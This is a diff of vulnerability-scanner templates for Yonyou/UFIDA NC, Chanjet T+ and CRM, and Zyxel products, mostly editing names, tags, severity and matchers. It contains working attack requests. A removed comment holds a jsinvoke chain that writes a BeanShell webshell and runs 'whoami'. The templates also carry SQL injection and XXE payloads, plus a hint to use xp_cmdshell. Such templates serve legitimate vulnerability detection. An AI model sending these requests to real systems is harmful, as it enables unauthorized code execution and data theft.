updated-templates-p

http/cnvd/2023/CNVD-C-2023-76801.yaml

@@ -1,11 +1,11 @@
-id: yonyou-nc-uapjs-jsinvoke-fileupload
+id: CNVD-C-2023-76801
 
 info:
-  name: Yonyou NC uapjs jsinvoke 文件上传漏洞
+  name: UFIDA NC uapjs - RCE vulnerability
   author: SleepingBag945
   severity: critical
-  description: 用友NC 及 NCC系统存在任意方法调用漏洞，通过uapjs (jsinvoke)利用漏洞可调用危险方法造成攻击。
+  description: There is an arbitrary method calling vulnerability in UFIDA NC and NCC systems. By exploiting the vulnerability through uapjs (jsinvoke), dangerous methods can be called to cause attacks.
-  tags: yonyou
+  tags: cvnd,cvnd2023,yonyou,rce
 
 http:
   - raw:
@@ -28,15 +28,3 @@ http:
           - status_code_1 == 200
           - status_code_2 == 200 && contains(body_2,"{{randstr_2}}")
         condition: and
-
-
-# POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
-# Host: {{Hostname}}
-
-# {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/404.jsp"]}
-
-
-# POST /cmdb.jsp?error=bsh.Interpreter HTTP/1.1
-# Host: {{Hostname}}
-
-# cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("whoami").getInputStream())

http/cves/2022/CVE-2022-0342.yaml

@@ -1,7 +1,7 @@
 id: CVE-2022-0342
 
 info:
-  name:  Zyxel - Authentication Bypass
+  name: Zyxel - Authentication Bypass
   author: SleepingBag945
   severity: critical
   description: |
@@ -10,7 +10,7 @@ info:
     max-request: 1
     fofa-query: app="ZyXEL-USG-FLEX"
     verified: true
-  tags: cve,cve2022,zyxel,auth-bypass
+  tags: cve,cve2022,zyxel,auth-bypass,router
 
 http:
   - method: GET

http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml

@@ -1,11 +1,11 @@
 id: chanjet-gnremote-sqli
 
 info:
-  name:  Changjietong Remote Communication GNRemote.dll - SQL Injection
+  name: Changjietong Remote Communication GNRemote.dll - SQL Injection
   author: SleepingBag945
   severity: high
   description: |
-    Changjietong Information Technology Co., Ltd. is a company dedicated to providing platform services, application services, and data value-added services with financial and management services as its core to China's small and micro enterprises. Changjietong Information Technology Co., Ltd. Chanjetong has a SQL injection vulnerability, which can be used by attackers to obtain sensitive information in the database.
+    Chanjetong has a SQL injection vulnerability, which can be used by attackers to obtain sensitive information in the database.
   reference: |
     - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9A%E8%BF%9C%E7%A8%8B%E9%80%9A%20GNRemote.dll%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
   metadata:
@@ -38,14 +38,8 @@ http:
         part: body_1
         words:
           - "{\"RetCode\":0}"
-        condition: and
 
       - type: word
         part: body_2
         words:
-          - "{\"RetCode\":2}"
+          - "{\"RetCode\":2}"
-        condition: and
-
-      - type: status
-        status:
-          - 200

http/vulnerabilities/yonyou/chanjet-tplus-file-read.yaml

@@ -28,6 +28,7 @@ http:
           - "<configuration>"
         condition: and
 
-      - type: status
+      - type: word
-        status:
+        part: header
-          - 200
+        words:
+          - "application/octet-stream"

http/vulnerabilities/yonyou/chanjet-tplus-fileupload.yaml

@@ -3,7 +3,7 @@ id: chanjet-tplus-fileupload
 info:
   name: UFIDA Chanjet TPluse Upload.aspx - Arbitrary File Upload
   author: SleepingBag945
-  severity: critical
+  severity: high
   description: |
     There is an arbitrary file upload vulnerability in the Upload.aspx interface of UFIDA Chanjet TPlus. An attacker can use the preload parameter to bypass authentication to upload files and control the server.
   reference:

http/vulnerabilities/yonyou/chanjet-tplus-ufida-sqli.yaml

@@ -20,20 +20,15 @@ http:
         POST /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-        Accept-Encoding: gzip
 
         {"AccountNum":"123 or 8767 IN (SELECT (sys.fn_sqlvarbasetostr(HASHBYTES('MD5','1'))))","UserName":"admin","Password":"e10adc3949ba59abbe56e057f20f883e","rdpYear":"2021","rdpMonth":"12","rdpDate":"9","webServiceProcessID":"admin","ali_csessionid":"","ali_sig":"","ali_token":"","ali_scene":"","role":"","aqdKey":"","fromWhere":"browser","cardNo":""}
 
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - "0x06d49632c9dc9bcb62aeaef99612ba6b"
           - "Message\":\"245"
           - "DatabaseException"
-        part: body
+        condition: and
-        condition: and
-
-      - type: status
-        status:
-          - 200

http/vulnerabilities/yonyou/chanjetcrm-createsite-sqli.yaml

@@ -1,21 +0,0 @@
-id: chanjetcrm-createsite-sqli
-
-info:
-  name: Chanjetcrm - create_site SQL Injection
-  author: unknown
-  severity: critical
-  description: |
-    There is an SQL injection vulnerability in the Changjetcrm financial crm system under Yonyou.
-  reference:
-    - https://stack.chaitin.com/techblog/detail?id=10
-  tags: chanjetcrm,sqli
-
-http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/WebSer~1/create_site.php?site_id=1" 
-    matchers:
-      - type: word
-        words:
-          - "register fail,please again"
-        part: body

http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml

@@ -1,4 +1,4 @@
-id: yonyou-nc-filereceiveservlet-fileupload
+id: yonyou-filereceiveservlet-fileupload
 
 info:
   name: Yonyou NC FileReceiveServlet - Aribitrary File Upload
@@ -12,7 +12,7 @@ info:
     max-request: 1
     fofa-query: app="用友-UFIDA-NC"
     verified: true
-  tags: yonyou,nc,fileupload,intrusive
+  tags: yonyou,fileupload,intrusive
 
 variables:
   file_name: "{{to_upper(rand_text_alphanumeric(5))}}.jsp"

http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml

@@ -1,10 +1,10 @@
-id: yonyou-grp-u8-sqli
+id: yonyou-grp-u8-xxe
 
 info:
-  name: yonyou-grp-u8-sqli
+  name: Yonyou UFIDA GRP-u8 - XXE
   author: SleepingBag945
   severity: critical
-  description: 用友GRP-u8存在XXE漏洞，该漏洞源于应用程序解析XML输入时没有进制外部实体的加载，导致可加载外部SQL语句，以及命令执行
+  description: UFIDA GRP-u8 has an XXE vulnerability. This vulnerability is caused by the application not loading external entities when parsing XML input, resulting in the loading of external SQL statements and command execution.
   reference:
     - http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20Proxy%20SQL%E6%B3%A8%E5%85%A5%20CNNVD-201610-923.html
   tags: yonyou,grp,xxe,sqli
@@ -14,26 +14,17 @@ http:
       - |
         POST /Proxy HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
-        Accept: */*
         Content-Type: application/x-www-form-urlencoded
         Accept-Encoding: gzip
 
         cVer=9.8.0&dp=%3c?xml%20version%3d%221.0%22%20encoding%3d%22GB2312%22?%3e%3cR9PACKET%20version%3d%221%22%3e%3cDATAFORMAT%3eXML%3c%2fDATAFORMAT%3e%3cR9FUNCTION%3e%3cNAME%3eAS_DataRequest%3c%2fNAME%3e%3cPARAMS%3e%3cPARAM%3e%3cNAME%3eProviderName%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3eDataSetProviderData%3c%2fDATA%3e%3c%2fPARAM%3e%3cPARAM%3e%3cNAME%3eData%3c%2fNAME%3e%3cDATA%20format%3d%22text%22%3e%20select%2042540%2a41369%20%3c%2fDATA%3e%3c%2fPARAM%3e%3c%2fPARAMS%3e%3c%2fR9FUNCTION%3e%3c%2fR9PACKET%3e
 
-
-
     matchers-condition: and
     matchers:
       - type: word
         words:
           - "1759837260"
+
       - type: word
         words:
-          - "<R9PACKET>"
+          - "<R9PACKET>"
-      - type: status
-        status:
-          - 200
-
-
-# 可尝试启动并调用xpcmdshell执行命令

http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml

@@ -22,5 +22,5 @@ http:
     matchers:
       - type: dsl
         dsl:
-          - 'status_code_1 == 200 && contains(body_1,"java.io")'
+          - 'status_code_1 == 200 && contains(body_1,"java.io") && contains(body_1,"EOFExceptionYI")'
         condition: and

http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml

@@ -11,7 +11,7 @@ info:
   metadata:
     fofa-query: icon_hash="1085941792"
     verified: true
-  tags: yonyou,nc,intrusive
+  tags: yonyou,intrusive,fileupload
 
 http:
   - raw:

http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml

@@ -13,7 +13,7 @@ info:
     max-request: 2  
     fofa-query: app="用友-UFIDA-NC
     verified: true  
-  tags: yonyou,nc,intrusive
+  tags: yonyou,intrusive,ufida,fileupload
 
 variables:
   v1: "{{rand_int(1,100)}}"

http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml

@@ -1,7 +1,7 @@
 id: yonyou-nc-ncmessageservlet-rce
 
 info:
-  name: UFIDA NC NCMessageServlet - Deserialization RCE Detect
+  name: UFIDA NC NCMessageServlet - Deserialization RCE Detection
   author: SleepingBag945
   severity: critical
   description: |
@@ -12,7 +12,7 @@ info:
     max-request: 2
     fofa-query: app="用友-UFIDA-NC
     verified: true
-  tags: yonyou,rce,deserialization,nc
+  tags: yonyou,rce,deserialization,rce
 
 http:
   - raw:

http/vulnerabilities/yonyou/yonyou-u8-crm-lfi.yaml

@@ -1,7 +1,7 @@
 id: yonyou-u8-crm-lfi
 
 info:
-  name: UFIDA U8 CRM  getemaildata.php - Arbitrary File Read
+  name: UFIDA U8 CRM getemaildata.php - Arbitrary File Read
   author: SleepingBag945
   severity: high
   description: |